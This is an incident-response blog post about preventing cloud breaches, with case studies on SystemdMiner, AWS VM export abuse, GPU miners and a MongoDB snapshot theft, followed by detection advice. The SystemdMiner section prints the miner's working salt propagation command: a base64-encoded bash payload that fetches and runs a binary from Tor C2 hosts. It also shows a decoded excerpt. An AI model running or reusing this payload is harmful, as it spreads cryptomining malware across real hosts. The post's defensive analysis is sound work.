From the Trenches: Common-Sense Measures to Prevent Cloud Incidents

Published in

ProferoSec

7 min readNov 21, 2021

Introduction

As an incident response team, we see a lot of cloud breaches that could have been prevented. Adequate protection requires in-depth knowledge of the cloud provider and its APIs and ample preparation. In cases when a company face time constraints, or its engineers have not received up-to-date training after a cloud migration, vulnerabilities open up. Whatever the reason, many cloud attacks can be easily avoided — in the following case studies, we offer advice on how.

This post is by no means a comprehensive guide to creating secure cloud environments. Rather, the examples included illustrate common weaknesses we encounter during our engagements, and steps companies can take to bolster their defenses.

If you are more of a video person, most of the content of this post was presented at a European cloud event, which you can view here: https://www.youtube.com/watch?v=QyzFe4uHSAw

SystemdMiner running in GCP

A healthcare provider contacted us after they received a GCP alert about one of their Linux instances. We carried out a forensic analysis of the instance in question and found a variant of SystemdMiner running on the machine. This miner consists of a series of obfuscated bash scripts and uses a cronjob to achieve persistence and contains a few other tricks to squeeze as much mining power out of an organization as possible before detection.

SystemdMiner attempts to use SaltStack as a means to spread throughout an organization. If it is executed on a host which acts as a salt master node, it will execute a base64 encoded payload on every node to which the machine has access. It does this by running the salt command line:

salt ‘*’ cmd.run ‘echo blA4YnlQVUdPd0tqVmZQWlpzcDVvY3RkWEhUV0d5UHFnVmVZODJ6VjFkZTZBWTB5ZEF0Z0VHbW8rSmF1bUVmVgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJ3dnp5djJucHRqdXhjcW9pYmVrbHhlc2U0Nmo0dW9uemFhcHd5bDZ3dmhka25qbHFsY29ldTdpZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQgb25pb24uZm91bmRhdGlvbiBvbmlvbi5jb20uZGUgb25pb24uc2ggdG9yMndlYi5zdSAKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash’

Included in this next stage is a snippet of code that uses a list of DNS over HTTPS services to resolve the relay.tor2socks.in domain, a service which this malware uses to communicate with .onion hidden services hosting its C2 servers on the Tor network:

sockz() {
n=(doh.defaultroutes.de dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
p=$(echo “dns-query?name=relay.tor2socks.in”)
s=$($c https://${n[$((RANDOM%10))]}/$p | grep -oE “\b([0–9]{1,3}\.){3}[0–9]{1,3}\b” |tr ‘ ‘ ‘\n’|grep -Ev [.]0|sort -uR|head -n 1)
}

This style of attack is becoming increasingly commonplace as more organizations have begun to take advantage of infrastructure as code — but without, unfortunately, utilizing the greatest strengths of this way of working:

The ability to block all changes to an organization’s infrastructure until the changes are reviewed and approved by multiple parties.
The removal of the need to grant engineers working on the infrastructure access to the underlying resources.

This attack serves as a great example of why protecting your deployment and management resources is important. A single engineer should never have the ability to make changes to infrastructure — this special access should instead be delegated to a secure pipeline where changes need to go through a review process and be approved by multiple parties before execution. Additionally, heightened care needs to be taken when defending these pipelines and their critical assets such as salt master nodes, terraform state files, code repositories storing the automation templates, etc.

AWS VM Export Abused to Breach Hashicorp Vault

Often when moving from traditional IT infrastructure to a cloud environment, some seemingly minor details get overlooked. This can lead to a domino effect of severe consequences in the case of a breach. In one example, after a large AWS breach, we conducted an IR investigation for our client to figure out how the attacker gained access to so many access tokens within the organization. The only correlation among these tokens was that they were all stored in a HashiCorp Vault instance which was running in EC2.

When examining the CloudTrail logs, we found a log showing a call to the CreateInstanceExportTask API. This was used to create a snapshot of the HashiCorp Vault instance, which the attacker then downloaded from an S3 bucket. From there, many other services were compromised using the secrets contained within this instance.

Although this was not the initial point of entry used to obtain access to the organization, this escalation of privileges was made possible because the client had not adequately restricted calls to these APIs — a small miss that resulted in a cascade of larger issues.

When setting up AWS and other cloud-based infrastructure, it is essential to consider how an attacker could access data contained within compute and database instances. We also recommend placing high-value VMs such as Vault instances or sensitive data in their own restricted AWS account, and to establish a system to monitor any authentications happening inside these accounts.

EC2 GPU Miners

One common method used to monetize AWS account access in recent years is to spin up GPU enabled EC2 instances, which mine on behalf of the attacker — on the victims’ dime. Tesla fell victim to this kind of attack in 2018.

Although these attacks are not the most effective way to turn illegitimate access into income, they are usually the result of wider-scale automated attacks and not carried out in a manual, hands-on-keyboard approach.

These attacks show why it is important to have billing alerts enabled, so that you will receive an alert when an account’s usage is above normal. We also recommend tailoring your CloudTrail alerts to your organizations’ usage. For example, if you don’t use GPU enabled EC2 instances or higher-tier CPU instances, you should be alerted if one is spun up in your account, prompting your company to investigate accordingly.

MongoDB Compromise

During another incident, an extortionist attacker made claims that they had a copy of the client’s production MongoDB database, containing sensitive customer information.

The database in question was housed in a private subnet, accessible only via a few backend API instances — none of which showed any signs of compromise. We analyzed the HTTP request logs and found no signs of compromise–so how did the attacker gain access to this data?

After investigating the CloudTrail logs, we discovered the attacker had simply restored a snapshot of the DocumentDB / MongoDB clusters using a public subnet and a security group that allowed connections from 0.0.0.0/0. Then, they connected to the database and pulled down all the data before destroying the cluster they had created. This was possible because the attacker had access to an AWS access key which could create new clusters using these snapshots, in addition to the fact that the victim organization had not set up CloudTrail alarms for such actions.

Mitigating the risk of this kind of attack requires adhering to the principles of least privilege and actively monitoring for anything out of the ordinary. Alerts that we would recommend creating to prevent this example include:

Any new security group policies allowing connections from anywhere, or depending on your use case, any new security group policies allowing connections from any non RFC 1918
Any new data resources being created (RDS instances, DocumentDB clusters, ElastiCache, etc) as these resources are seldom created. In cases when they are created more than usual — in staging/dev environments or during blue/green deployments — simply add the appropriate exceptions in your alerting.

Timely responses to these kinds of alerts can be the difference between stopping the exfiltration of private data or picking up the pieces in the aftermath of an incident.

Looking for Offensive Attackers

When scanning for attackers in your environment, it is important to establish and follow best practices. Some tips are below:

Prep

It is essential to prepare your environment to be able to detect malicious behavior:

Stream your CloudTrail logs to an S3 bucket with MFA delete enabled, preferably in a separate AWS account dedicated to storing audit logs
Ensure Athena is configured so that during an incident you can quickly query your CloudTrail logs from this bucket

Asset Discovery

Having good config and asset management is extremely important when detecting something out of the ordinary that requires investigation. These are some tools that we use to find assets in our client’s environments:

Scout Suite
AWS Billing Console
AWS Config

Use the Tools Available to You

There are many other tools available to organizations, such as open- source tools like SkyWrapper which is used for finding STS token chains in AWS accounts, AWS Guard Duty, and even checking for changes in your billing console can lead to the identification of malicious activity.

Investigate CloudTrail

If CloudTrail is active but is not being regularly monitored and reviewed, it can only be used as evidence after an incident. This is a missed opportunity, because it is one of the best and easiest tools to engage for early detection and prevention. Some things to look for when reviewing logs include:

Known IOCs appearing in the logs
Changes to resources such as CloudFormation stacks — these should be enabled to trigger alerts, in order to ease manual review
Database actions such as copies being made, data deleted, new instances created or instances being exported
Network configuration changes/security group policy modifications

Common Mistakes

Here are some common mistakes we run into when we start an IR:

Logs such as CloudTrail incorrectly stored in S3 buckets, such as misconfiguring the target directory when exporting multiple AWS account trails into the same bucket. This hinders the creation of Athena tables.
Logs prior to an incident unsearchable, because Athena’s full range of capabilities were not enabled, or the logs were not exported to CloudWatch or other log storage such as ElasticSearch.
Engineers involved have no incident response training or practice. Game days are excellent opportunities to show engineers what they should be do in the early stages of a security incident.
Alerting has not been tailored for the organization’s environment. There is no “one size fits all” for alerting. Only you know your environment well enough to understand what is normal activity and what is not — the best people to write alerts are always your own engineers.

Overall Recommendations

In summary, these are the most important elements in securing a cloud environment — which together will offer your company a vital layer of protection against a range of the most common cloud threats in circulation today:

Get the basics right first — don’t wait for an attack
Know your environment: monitor your weak points, understand your usual activity
Create alerts tailored to your usage
Investigate alerts in a timely manner
Enable all available logging (data access logging, packet flow logs, etc)
Ensure logs are searchable
Practice your response, and provide regular updates and training for your engineers
Constantly reevaluate your security requirements as your environment changes